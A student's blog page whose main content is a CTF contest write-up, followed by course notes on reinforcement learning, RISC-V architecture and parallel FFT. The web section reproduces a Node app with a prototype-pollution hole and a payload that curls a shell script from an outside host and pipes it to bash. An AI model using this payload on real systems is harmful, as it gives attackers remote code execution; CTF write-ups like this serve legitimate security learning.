Study 📕 - Page 17 - vickieGPT’s blog

May 11, 2020May 11, 2020

Reflection on our 2020 Wang Ding CTF contest

Result

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

Play the game with gorgeous names in the CTF conf.

Flag in "F12"

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

Unfortunately, there is a VM inside. From vm_operad, we have

The key is case 7: we can trace the value of a1[v10+1] to figure out what happens. So, fire up OD (OllyDbg).

Applying the table

/* Operation table fed to the VM of the "signal" challenge, reproduced verbatim.
 * NOTE(review): the trailing `7, X` pairs line up with the right-hand sides of
 * the handler equations listed below (bytes >= 0x80 appear followed by
 * 0xFF, 0xFF, 0xFF), so opcode 7 presumably carries the expected value of each
 * check -- confirm against the binary. */
int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduce that case 8 reads the user's input, and treat the handlers like the vector handlers in an OS.

the handler can be enumerated as

(10h ^ v8[1]) - 5 = 22h
(20h ^ v8[2]) * 3 = 3Fh
v8[3] - 2 - 1 = 34h
(v8[4] + 1) ^ 4 = 32h
v8[5] * 3 - 21h = 72h
v8[6] - 1 - 1 = 33h
(9 ^ v8[7]) - 20h = 18h
(51h + v8[8]) ^ 24h = A7h
v8[9] + 1 - 1 = 31h
2 * v8[10] + 25h = F1h
(36h + v8[11]) ^ 41h = 28h
(20h + v8[12]) * 1 = 84h
3 * v8[13] + 25h = C1h
(9 ^ v8[14]) - 20h = 1Eh
41h + v8[15] + 1 = 7Ah

Eventually we get the total flag{757515121f3d478}.

Web

Notes

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
/**
 * In-memory notebook keyed by an auto-incrementing numeric id (stored as a string).
 *
 * Note ids supplied by callers are handed to `undefsafe` as property paths
 * without any filtering; this is the challenge code as published, and the
 * write-up's payload relies on that.
 */
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    /**
     * Appends a note under the next free id and advances the counter.
     * @param {*} author - stored as the note's `author` field
     * @param {*} raw_note - stored as the note's `raw_note` field
     */
    write_note(author, raw_note) {
        const slot = this.num++;
        this.note_list[String(slot)] = { author, raw_note };
    }

    /**
     * Looks `id` up in the note list via `undefsafe` and writes the result
     * into a fresh object at the same path.
     * @param {*} id - property path passed straight to `undefsafe`
     * @returns {object} the fresh object after the write
     */
    get_note(id) {
        const holder = {};
        const found = undefsafe(this.note_list, id);
        undefsafe(holder, id, found);
        return holder;
    }

    /**
     * Overwrites `<id>.author` and then `<id>.raw_note` through `undefsafe`.
     * @param {*} id - path prefix, concatenated with the field suffix
     * @param {*} author - new author value
     * @param {*} raw - new note body
     */
    edit_note(id, author, raw) {
        const updates = [
            ['.author', author],
            ['.raw_note', raw],
        ];
        for (const [suffix, value] of updates) {
            undefsafe(this.note_list, id + suffix, value);
        }
    }

    /** @returns {object} the live note map itself (not a copy) */
    get_all_notes() {
        const { note_list } = this;
        return note_list;
    }

    /**
     * Deletes the entry stored under `id`, if any.
     * @param {*} id - key in the note map
     */
    remove_note(id) {
        const store = this.note_list;
        delete store[id];
    }
}

// Single in-memory note store shared by every route, seeded with one note.
var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


// Pug templates are resolved from the "views" directory next to this file.
const viewsDir = path.join(__dirname, 'views');
app.set('views', viewsDir);
app.set('view engine', 'pug');

// Body parsers (JSON, then non-extended urlencoded), then static files from "public".
const publicDir = path.join(__dirname, 'public');
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(publicDir));


// Landing page: renders the "index" view with the page title.
app.get('/', (req, res, next) => {
  const locals = { title: 'Notebook' };
  res.render('index', locals);
});

// /add_note: GET only explains the endpoint; POST stores a note from the request body.
app.route('/add_note')
    .get((req, res) => {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post((req, res) => {
        const { author, raw } = req.body;
        // Both fields must be truthy, otherwise nothing is stored.
        if (!author || !raw) {
            res.render('mess', {message: "did not add note"});
            return;
        }
        notes.write_note(author, raw);
        res.render('mess', {message: "add note sucess"});
    })

// /edit_note: GET only explains the endpoint; POST rewrites author and body of a note.
// The id from the request body is forwarded to Notes.edit_note unchanged.
app.route('/edit_note')
    .get((req, res) => {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post((req, res) => {
        const { id, author, raw: enote } = req.body;
        // All three fields must be truthy for the edit to be attempted.
        if (!(id && author && enote)) {
            res.render('mess', {message: "edit note failed"});
            return;
        }
        notes.edit_note(id, author, enote);
        res.render('mess', {message: "edit note sucess"});
    })

// /delete_note: GET only explains the endpoint; POST removes the note with the given id.
app.route('/delete_note')
    .get((req, res) => {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post((req, res) => {
        const { id } = req.body;
        // A missing or falsy id is reported as a failure without touching the store.
        if (!id) {
            res.render('mess', {message: "delete failed"});
            return;
        }
        notes.remove_note(id);
        res.render('mess', {message: "delete done"});
    })

// /notes: without ?q= lists every note, with ?q= looks up that single path.
app.route('/notes')
    .get((req, res) => {
        const { q } = req.query;
        const list = q === undefined
            ? notes.get_all_notes()
            : notes.get_note(q);
        res.render('note', {list});
    })

// /status: runs each entry of the command table through bash and logs its stdout,
// then answers "OK" without waiting for the commands to finish.
app.route('/status')
    .get((req, res) => {
        const commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        // for...in is kept as in the challenge source: it also visits enumerable
        // keys inherited through the prototype chain, not just the two listed above.
        for (const name in commands) {
            const commandLine = commands[name];
            exec(commandLine, {shell:'/bin/bash'}, (err, stdout, stderr) => {
                // Failed commands are ignored; only successful output is logged.
                if (!err) {
                    console.log(`stdout: ${stdout}`);
                }
            });
        }
        res.send('OK');
        res.end();
    })


// Catch-all for requests that no earlier route answered: plain-text 404.
app.use((req, res, next) => {
  const notFound = res.status(404);
  notFound.send('Sorry cant find that!');
});


// Error-handling middleware: logs the error's stack and answers with a 500.
// All four parameters are kept so the function's arity matches the original.
app.use((err, req, res, next) => {
  const { stack } = err;
  console.error(stack);
  res.status(500).send('Something broke!');
});


// Start the HTTP server on a fixed port and log the local URL once it is listening.
const port = 8080;
function announceListening() {
  console.log(`Example app listening at http://localhost:${port}`);
}
app.listen(port, announceListening);

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{8c46c34a-fa1f-4fc9-81bd-609b1aafff8a}

Crypto

boom

just play a simple game

md5:en5oy

stupid z=31,y=68, x=74

stupid Mathematica.

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

# Modulus: a power of two (2**512).
n = 2 ** 512
# Random base in [2, n-1]; `| 1` sets the lowest bit, so m is always odd.
m = random.randint(2, n-1) | 1
# c = m ** flag mod n, with the flag bytes turned into an integer exponent by
# bytes_to_long. `flag` is not defined anywhere in this excerpt.
c = pow(m, bytes_to_long(flag), n)
# Python 2 print statements: emit m and c in decimal.
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is solve $m^f \equiv c \pmod{n}$ for the exponent $f$ (the flag).

$n$ is actually $2^{512}$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

April 12, 2020February 9, 2022

[RL] RL Category

Following Wikipedia:

Reinforcement Learning is an area of machine learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximize some notion of cumulative reward.

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

behaviors that result in praise/pleasure tend to repeat
behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with sensors, end-effectors, and goals

Action

Used by the agent to interact with the environment.
May have many different temporal granularities and abstractions

reward

A reward $R_t$ is a scalar feedback signal

Indicates how well agent is doing at step t

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

dynamics are known or are estimated
solving RL problems that use models and planning

Model-free RL

unknown dynamics
explicitly trial-and-error learners

not necessarily iid

P.S. 逆强化学习。

Summary

April 11, 2020February 9, 2022

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

Multiple issue “superscalar”
- Replicate pipeline stages ⇒ multiple pipelines
- Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
- E.g., 4GHz 4-way multiple-issue
  - 16 BIPS, peak CPI = 0.25, peak IPC = 4
- But dependencies reduce this in practice
“Out-of-Order” execution
- Reorder instructions dynamically in hardware to reduce impact of hazards
Hyper-threading

Pipelining recap

pipeline complexities explained

GPRs FPRs

More than one Functional Unit
Floating point execution!
- Fadd & Fmul: fixed number of cycles; > 1
- Fdiv: unknown number of cycles!
Memory access: on Cache miss unknown number of cycles
Issue: Assign instruction to functional unit

summary

Some static multiple issues

VLIW: very long instruction word

The solution can be easily found

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipelines need speculation

[ ] E. superscalar processor can execute

April 1, 2020February 9, 2022

[Computer Architecture] data path

intro - where are we now?

the cpu

Processor - datapath - control

Scenario in RISC-V machine

The datapath and control

Overview

problem: single monolithic block
solution: break up the process of executing an instruction into stages
- smaller stages are easier to design
- easy to optimize & modularity

five stages

Instruction Fetch
- pc+=4
- take full use of mem hierarchy
Instruction Decode
read the opcode to determine instruction type and field lengths
second, (at the same time!) read in data from all necessary registers
- for add, read two registers
- for addi, read one register
third, generate the immediates
ALU
- the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
- Loads and stores use it too, for instance:
  - lw t0, 40(t1)
  - the address we are accessing in memory = the value in t1 PLUS the value 40
  - so we do this addition in this stage
Mem access
- Actually only the load and store instruction do anything during this stage.
- it's fast but unavoidable
Register write
- write the result of some computation into a register.
- for stores and branches, this stage is idle
  
  misc
memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

for D

for E

March 27, 2020February 9, 2022

CS 150 is composed of the TsingHua's 计算机组成原理 and VLSI

source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

They studied verilog

FSM is really similar to our homework. Actually, I found that their exams are given to us as homework.

P.S.: WHY they have spring break?

run a linux on FPGA. and implement a CPU. 俗称“造机”。

If I have time, I'll implement the CPU by my own.

GPU applying the RISC-V architecture will be much better and cooler.

The more I read and learn, the more I find that the knowledge in the EECS category can be nicely cascaded. In most cases, we get the point from another place and can be taught within minutes.

After talking with upperclassman 罗浩聪, I gradually found my career path: a PhD in Arch or PL, or something in between. But for now, let me finish the 2 collaborative papers.

March 26, 2020February 9, 2022

[Computer Architecture] Circuit

intro

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

switches

arrow shows action if wire changes to 1 or is asserted.

and & or

Transistors

High voltage$V_{dd}$ Low voltage $Gnd$

PWD

we implement switches using CMOS

CMOS Transistor Network

note PWD

material:

how MOSFET Operation

CMOS Networks

2 input network

combined logic symbols

example debugging waveform

types of circuits

example using time chart

March 21, 2020February 9, 2022

[Computer Architecture] call

Language Execution continuum

An interpreter is a program that executes other programs.

Language translation gives us another option.
In general, we translate a high-level language to a lower-level language to increase performance.

interpretation

Python
asm

Assembler directives

pseudo-instruction replacement

what's tail's about

{...
 lots of code
 return foo(y);
}

it's recursive call to foo() if this is within foo(), or call to a different function...
for efficiency
- Evaluate the arguments for foo() in a0-a7
- Restore ra, all callee saved registers and sp
- Then call foo() with j or tail
when foo() returns, it can return directly to where it needs to return to
- Rather than returning to wherever foo() was called and returning from there
- Tail call optimization

branches

Linking progress

Four types of Address

PC-relative addressing (beq)

Absolute addresses in RISC-V

Loading process

March 19, 2020February 9, 2022

Running a Program - CALL(Compiling, Assembling, Linking, and Loading)

Clarifications

Project 1 RISC-v emulator

Risc-v isa does not define assembly syntax
behave exactly like Venus
All I-Type instructions (including sltiu)
- do sign-extension
- (in venus) input number is signed, even if hex

a good tool

Interpretation

Any good reason to interpret machine language in software? A debugger, e.g. Venus.
Translated/compiled code is almost always more efficient and therefore higher performance:
- important for many applications, particularly operating systems.

Steps in compiling a C program

Pseudo-instruction Replacement

Producing Machine Language

simple case
- arithmetic, logical, shifts and so on
- All necessary info is within the instruction already
branches can be optimized

March 19, 2020March 19, 2020

What to care about the bugs in Syscalls

March 17, 2020May 24, 2020

parallel programming 23 parallel fft

One of the most important algorithms in the new century

Intro to the fft

The basic equation of the FFT

$F(\omega)=\mathcal{F}[f(t)]=\int_{-\infty}^{+\infty} f(t)\,e^{-j\omega t}\,dt$

Roots of unity

\[
\begin{array}{l}\text{An } n\text{'th root of unity is an } \omega \text{ s.t. } \omega^{n}=1. \\ \text{There are } n \text{ distinct } n\text{'th roots of unity, and they have the form } e^{\frac{2 \pi i k}{n}}, \text{ for } 0 \leq k \leq n-1. \\ \text{Write } \omega_{n}=e^{\frac{2 \pi i}{n}}, \text{ so that the } n\text{'th roots of unity are } \omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}. \end{array}\]

Some problems to differ FT, DFT, FFT, IFFT

They are the Fourier Transform, Discrete Fourier Transform, Fast Fourier Transform and Inverse Fast Fourier Transform.
The transform factor:
$\text{Fact 1: } \omega_{n}^{n}=1. \quad \text{Fact 2: } \omega_{n}^{k+\frac{n}{2}}=-\omega_{n}^{k}. \quad \text{Fact 3: } \left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}.$

Why we should have the DFT.
Because in theory, all the data stored in a computer is discrete. So we have to use the equation $X(k)=\sum_{n=0}^{N-1} x(n)\,W_{N}^{kn} \ (k\in \mathbb{N})$

The transform factor has the following properties:
1) Periodicity
$W_{N}^{m+l N}=W_{N}^{m}$, where $W_{N}^{-m}=W_{N}^{N-m}$
2) Symmetry
$W_{N}^{m+\frac{N}{2}}=-W_{N}^{m}$
3) Contractability
$W_{N / m}^{k}=W_{N}^{m k}$
4) Special rotation factors
$W_{N}^{0}=1$

Why Fourier Fast Algorithm (aka FFT)?

FFT is a DFT-based algorithm designed to accelerate the computational speed of DFT.

Given a degree $n-1$ polynomial
$A(x)=a_{0}+a_{1} x+a_{2} x^{2}+\dots+a_{n-1} x^{n-1}$
DFT computes $A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)$
since $A(x)=a_{0}+x\left(a_{1}+x\left(a_{2}+\cdots\right) \ldots\right)$
$A(x)$ can be evaluated in $\mathrm{O}(\mathrm{n})$ time and
$\mathrm{O}(1)$ memory.

DFT can be computed trivially in $\mathrm{O}\left(\mathrm{n}^{2}\right)$
time.

For a direct computer implementation of the DFT formula the complexity is $O(N^2)$, while the complexity of the FFT calculation is reduced to $O(N \log_2 N)$.

What is the sequence split extraction in FFT?

The sequence splitting process of FFT is the extraction process, which is divided into: extraction by time and extraction by frequency.

1) Extraction by time (also called parity extraction)

2) Frequency, which we don’t apply here.

How does FFT reduce the amount of computation?

In simple terms, mathematicians use the above mentioned properties of the rotation factor W such as periodicity, symmetry, etc. to simplify the formula. In algorithmic programming, new points are constantly counted using points that have already been counted, i.e., old points count new points.

Theoretically, FFT computes the DFT in O(n log n) time using divide and conquer.
- Suppose $n$ is a power of 2.
Let $A^{[0]}=a_{0}+a_{2} x^{1}+a_{4} x^{2}+\cdots+a_{n-2} x^{\frac{n}{2}-1}$
$A^{[1]}=a_{1}+a_{3} x^{1}+a_{5} x^{2}+\cdots+a_{n-1} x^{\frac{n}{2}-1}$
Then $A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)$.
So can compute $A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)$ by computing $A^{[0]}$ and $A^{[1]}$
at $\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}$, and multiplying some terms by
$\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}$.
But $\left(\omega_{n}^{k+n / 2}\right)^{2}=\omega_{n}^{2 k+n}=\omega_{n}^{2 k}=\left(\omega_{n}^{k}\right)^{2}$ by Fact 1.
So $\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}\right\}=\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n / 2-1}\right)^{2}\right\},$ i.e. only need
to evaluate $A^{[0]}$ and $A^{[1]}$ at n/2 points instead of n.
Also, $\left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}$

Note: Simply splitting a multipoint sequence into a less point sequence without simplification is not a reduction in arithmetic volume!!! Splitting is only in the service of simplification, using the spin factor is the key to arithmetic reduction!!!

Time Complexity:
Thus, computing $A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)$ for
$x \in\left\{\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}\right\}$ requires
- Computing $A^{[0]}(x)$ and $A^{[1]}(x)$ for $x \in$
$\left\{\omega_{n / 2}^{0}, \omega_{n / 2}^{1}, \ldots, \omega_{n / 2}^{n / 2-1}\right\}$

These are also DFT’s, so can be done recursively using two
n/2-point FFT’s.
- For $0 \leq k \leq \frac{n}{2}-1$
\[
\begin{aligned} A\left(\omega_{n}^{k}\right) &= A^{[0]}\left(\omega_{n / 2}^{k}\right)+\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right) \\ A\left(\omega_{n}^{k+n / 2}\right) &= A^{[0]}\left(\omega_{n / 2}^{k+n / 2}\right)+\omega_{n}^{k+n / 2} A^{[1]}\left(\omega_{n / 2}^{k+n / 2}\right) \\ &= A^{[0]}\left(\omega_{n / 2}^{k}\right)-\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right) \end{aligned}
\]

Butterfly operation?

For a butterfly operation, you can understand it as an operation that is customizable by a graph.

The left side is the input and the right side is the output, for the letters on the horizontal line there are two cases.

1) A number on the left end line (none means C and D are 1).

2)The right end lines have the numerical representation, but if none, C & D are 0s.

The FFT takes out odd and even in accordance to time to change the original sequence. which have to sequentialize it to make the algorithm meet the required sequence. The new sequence is the reverse binary sequence of the original ones.

For example $(a_0 a_4 a_2 a_6 a_1 a_5 a_3 a_7)$ have the binary indices $(000, 100, 010, 110, 001, 101, 011, 111)$.
Reversing the bits of each index gives back the natural order, which in this case is: $(a_0 a_1 a_2 a_3 a_4 a_5 a_6 a_7)$;

That is, $(000, 001, 010, 011, 100, 101, 110, 111) \rightarrow (000, 100, 010, 110, 001, 101, 011, 111)$.

The code for this transformation:

/* Bit-reversal reordering: for every index I below N, build J by mirroring the
 * bits of I around the centre of an M-bit word, then swap A[I] with A[J]. */
for(I=0;I<N;I++) // visit every element of the array
{  
  /* J accumulates the bit-reversed value of index I */ 
  J=0;
  for(k=0;k<(M/2+0.5);k++) // k picks one pair of mirrored bit positions
     {
        /* Mirror one pair of bits */
        m=1;// m starts as the lowest bit
        n=(unsigned int)pow(2,M-1);// n starts as 2^(M-1)
        m <<= k; // m now masks bit k
        n>>= k; // n now masks bit M-1-k
        F0=I & n;// nonzero when bit M-1-k of I is set
        F1=I & m;// nonzero when bit k of I is set
        if(F0) J=J | m; // a set bit M-1-k of I becomes bit k of J
        if(F1) J=J | n; // a set bit k of I becomes bit M-1-k of J
     }
   if(I<J) // swap only when I<J, so each pair is exchanged once
    {
      Temp=A[I];
      A[I] =A[J];
      A[J]=Temp;
    }                                
}

The butterfly operation:
Now let’s imagine that if we want to program the FFT algorithm, the most basic implementation of the FFT algorithm is the butterfly operation, for any butterfly such as.

When N=8.

As can be seen from the above figure, to perform the butterfly operation, we have to solve the following problems.

Interval B between two input data
Determination of the rotation factor W, including.
- Determination of the L-level rotation index P.
- Determination of the type of Level L W.
- The interval between the same W in level L.

$\left\{\begin{array}{l}T_{R}=X_{R}(j+B) \cos \frac{2 \pi}{N} p+X_{I}(j+B) \sin \frac{2 \pi}{N} p \quad (1) \\ T_{I}=X_{I}(j+B) \cos \frac{2 \pi}{N} p-X_{R}(j+B) \sin \frac{2 \pi}{N} p \quad (2) \\ A_{R}(j)=X_{R}(j)+T_{R} \quad (3) \\ A_{I}(j)=X_{I}(j)+T_{I} \quad (4) \\ A_{R}(j+B)=X_{R}(j)-T_{R} \quad (5) \\ A_{I}(j+B)=X_{I}(j)-T_{I} \quad (6)\end{array}\right.$

/*
 * In-place butterfly passes over dataR/dataI (real/imaginary parts), one pass
 * per level L = 1..M. Each butterfly combines elements r and r+B:
 *   T         = X[r+B] * (cos(2*pi*p/N) - i*sin(2*pi*p/N))
 *   X[r+B]    = X[r] - T
 *   X[r]      = X[r] + T
 * All loop variables, the data arrays, PI and N are declared by the
 * surrounding code, which is not shown here.
 */
for(L=1; L<=M; L++) // butterfly level L runs from 1 to M
{
  /* Distance between the two inputs of one butterfly: B = 2^(L-1) */
  B = 1 << (L-1);
  /* Stride of the rotation index and number of butterflies per j: k = 2^(M-L) */
  k = 1 << (M-L);
  for(j=0; j<=B-1; j++)
  {
    double Wr, Wi; /* real and imaginary magnitude of the rotation factor */

    /* Rotation index for this j; the factor depends only on p, so cos/sin
       are evaluated once here instead of once per butterfly. */
    p = j*k;
    Wr = cos(2.0*PI*p/N);
    Wi = sin(2.0*PI*p/N);
    for(i=0; i<=k-1; i++)
    {
      /* Index of the upper input of the i-th butterfly that uses this factor */
      r = j + 2*B*i;
      Tr = dataR[r+B]*Wr + dataI[r+B]*Wi;
      Ti = dataI[r+B]*Wr - dataR[r+B]*Wi;
      /* The lower output must be written first: it still needs the old X[r] */
      dataR[r+B] = dataR[r]-Tr;
      dataI[r+B] = dataI[r]-Ti;
      dataR[r] = dataR[r]+Tr;
      dataI[r] = dataI[r]+Ti;
    }
  }
}

IFFT is the reverse of the above operation.

What if we take it on the mesh or hypercube to make it scalable on GPU operations?

Hypercube:

Consider the binary exchange algorithm on a hypercube architecture.
Each processor connected to d others, which differ in each digit of ID.
- Communication only with neighbors, send n/p values each time.
- since d = log p rounds of communication, communication time $T_{c}=t_{s} \log p+t_{w} \frac{n}{p} \log p .$
Each stage does n/p computation.
- Total computation time $T_{p}=\frac{t_{c} n}{p} \log n$.
Efficiency is $E=\frac{T_{p}}{T_{p}+T_{c}}=1 /\left(1+\frac{t_{s} p \log p}{t_{c} n \log n}+\frac{t_{w} \log p}{t_{c} \log n}\right)$
Define $K$ such that $E=1 /(1+1 / K) .$
For isoefficiency, want last two terms in denominator to be constant.
$\frac{t_{s} p \log p}{t_{c} n \log n}=\frac{1}{K}$ implies $n \log n=W=K \frac{t_{s}}{t_{c}} p \log p .$
$\frac{t_{w} \log p}{t_{c} \log n}=\frac{1}{K}$ implies $\log n=K \frac{t_{w}}{t_{c}} \log p,$ so $n=p^{K t_{w} / t_{c}},$ so
$W=K \frac{t_{w}}{t_{c}} p^{K t_{w} / t_{c}} \log p$

The efficiency for this case depends on $t_c,t_s,t_w$, the wait time is the tradeoffs between two different lines. which is:

From the efficiency law, once $\frac{Kt_w}{t_c}>1$, the isoefficiency function grows polynomially with regard to the processor count.

Mesh:

2D transpose FFT: The best:

Reference

Prof Fan’s PPT
Implement FFT in C by GoKing
Implement FFT on QPU rpi3b+ by Andrew Holme

Result

Misc

qiandao

Reverse

signal

Web

Notes

Crypto

boom

You Raise Me up

Reflection

Behavioral Psychology

agent

Action

reward

Main Topics of Reinforcement Learning

Summary

Greater Instruction-Level Parallelism (ILP)

Pipelining recap

pipeline complexities explained

GPRs FPRs

summary

Some static multiple issues

VLIW: very long instruction word

Quiz

intro - where are we now?

the cpu

Scenario in RISC-V machine

The datapath and control

Overview

five stages

misc

memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

CS 150 is composed of the TsingHua's 计算机组成原理 and VLSI

intro

synchronous digital systems

switches

Transistors

CMOS Transistor Network

how MOSFET Operation

CMOS Networks

2 input network

combined logic symbols

example debugging waveform

types of circuits

example using time chart

Language Execution continuum

interpretation

Assembler directives

pseudo-instruction replacement

what's tail's about

branches

Linking progress

Four types of Address

Absolute addresses in RISC-V

Loading process

Clarifications

Project 1 RISC-v emulator

Interpretation

Steps in compiling a C program

Pseudo-instruction Replacement

Producing Machine Language

One of the most important algorithms in the new century

Intro to the fft

The basic equation of the FFT

Roots of unity

Some problems to differ FT, DFT, FFT, IFFT

Reference